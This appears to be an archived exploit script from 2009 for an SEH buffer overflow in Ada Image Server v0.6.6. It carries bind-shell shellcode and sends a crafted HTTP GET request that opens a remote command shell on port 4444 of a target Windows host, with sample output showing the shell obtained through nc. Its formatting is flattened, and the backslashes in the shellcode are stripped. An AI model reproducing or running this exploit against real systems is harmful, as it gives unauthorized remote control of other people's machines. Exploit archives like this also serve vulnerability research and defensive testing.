imgsrv.py.txt
Posted on 08 October 2009
#!/usr/bin/python # Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe. # However, it contains a null character in the address (ex: XP SP3 => 00689aff). # Versions above 0.6.7 do not seem to be vulnerable. # # $ ./imgsrv.py 192.168.1.146 # # [*] Ada Image Server v0.6.6 SEH Overwrite # [*] Discovered/Exploited by Blake # [*] Tested on XP SP1 # # [+] Connecting to 192.168.1.146 # [+] Sending payload # [+] Payload Sent # # $ nc 192.168.1.146 4444 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Program FilesImgsvr> import socket, sys print " [*] Ada Image Server v0.6.6 SEH Overwrite" print "[*] Discovered/Exploited by Blake" print "[*] Tested on XP SP1 " if len(sys.argv)!= 2: print "[*] Usage: %s <ip> " % sys.argv[0] sys.exit(0) host = sys.argv[1] port = 1235 # default port # windows/shell_bind_tcp - 696 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, LPORT=4444, RHOST= shellcode = ( "x89xe1xdaxd5xd9x71xf4x5ex56x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x4bx4cx43x5ax4ax4bx50x4dx4dx38x4cx39x4bx4fx4b" "x4fx4bx4fx43x50x4cx4bx42x4cx51x34x47x54x4cx4b" "x51x55x47x4cx4cx4bx43x4cx44x45x42x58x45x51x4a" "x4fx4cx4bx50x4fx45x48x4cx4bx51x4fx47x50x43x31" "x4ax4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex46" "x51x49x50x4dx49x4ex4cx4dx54x49x50x43x44x44x47" "x49x51x48x4ax44x4dx43x31x48x42x4ax4bx4cx34x47" "x4bx51x44x47x54x47x58x44x35x4ax45x4cx4bx51x4f" "x51x34x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c" "x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b" "x4dx59x42x4cx46x44x45x4cx45x31x48x43x50x31x49" "x4bx43x54x4cx4bx50x43x46x50x4cx4bx47x30x44x4c" "x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51" "x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f" "x4ex36x45x36x50x53x43x56x43x58x46x53x46x52x45" "x38x42x57x43x43x46x52x51x4fx51x44x4bx4fx48x50" "x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48" "x56x51x4fx4cx49x4dx35x45x36x4bx31x4ax4dx44x48" "x43x32x50x55x42x4ax43x32x4bx4fx4ex30x45x38x48" "x59x43x39x4ax55x4ex4dx46x37x4bx4fx4ex36x51x43" "x51x43x51x43x51x43x51x43x51x53x51x43x50x43x50" "x53x4bx4fx48x50x45x36x43x58x42x31x51x4cx45x36" "x51x43x4dx59x4dx31x4ax35x43x58x4ex44x45x4ax44" "x30x48x47x46x37x4bx4fx49x46x42x4ax42x30x46x31" "x50x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4d" "x39x46x37x4bx4fx4ex36x46x33x50x55x4bx4fx48x50" "x43x58x4bx55x50x49x4cx46x50x49x46x37x4bx4fx4e" "x36x50x50x51x44x50x54x50x55x4bx4fx48x50x4ax33" "x42x48x4bx57x44x39x48x46x44x39x51x47x4bx4fx49" "x46x46x35x4bx4fx48x50x45x36x42x4ax43x54x43x56" "x42x48x42x43x42x4dx4bx39x4bx55x42x4ax50x50x50" "x59x51x39x48x4cx4cx49x4ax47x43x5ax47x34x4bx39" "x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex47x32x46" "x4dx4bx4ex47x32x46x4cx4dx43x4cx4dx42x5ax50x38" "x4ex4bx4ex4bx4ex4bx45x38x43x42x4bx4ex4ex53x44" "x56x4bx4fx42x55x47x34x4bx4fx4ex36x51x4bx50x57" "x51x42x50x51x50x51x50x51x42x4ax45x51x50x51x50" "x51x50x55x50x51x4bx4fx4ex30x42x48x4ex4dx4ex39" "x44x45x48x4ex46x33x4bx4fx49x46x43x5ax4bx4fx4b" "x4fx46x57x4bx4fx48x50x4cx4bx50x57x4bx4cx4bx33" "x49x54x42x44x4bx4fx49x46x50x52x4bx4fx48x50x43" "x58x4cx30x4cx4ax43x34x51x4fx51x43x4bx4fx48x56" "x4bx4fx4ex30x41x41") payload = "x41" * 19000 # overwrites seh handler at 19734 nops = "x90" * 29 # nop sled sc = shellcode # shellcode - 696 bytes near_jmp = "xe9x44xfdxffxff" # jump back -700 bytes next_seh = "xebxf9xffxff" # jump back -7 bytes seh = "x10xbfxc1x77" # c:windowssystem32msvcrt.dll junk = "x43" * 262 # junk buffer print "[+] Connecting to %s" % host s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host,port)) except: print "[x] Could not connect! " sys.exit(0) print "[+] Sending payload" s.send("GET /" + payload + nops + sc + near_jmp + next_seh + seh + junk + " HTTP/1.0 ") s.close() print "[+] Payload Sent "
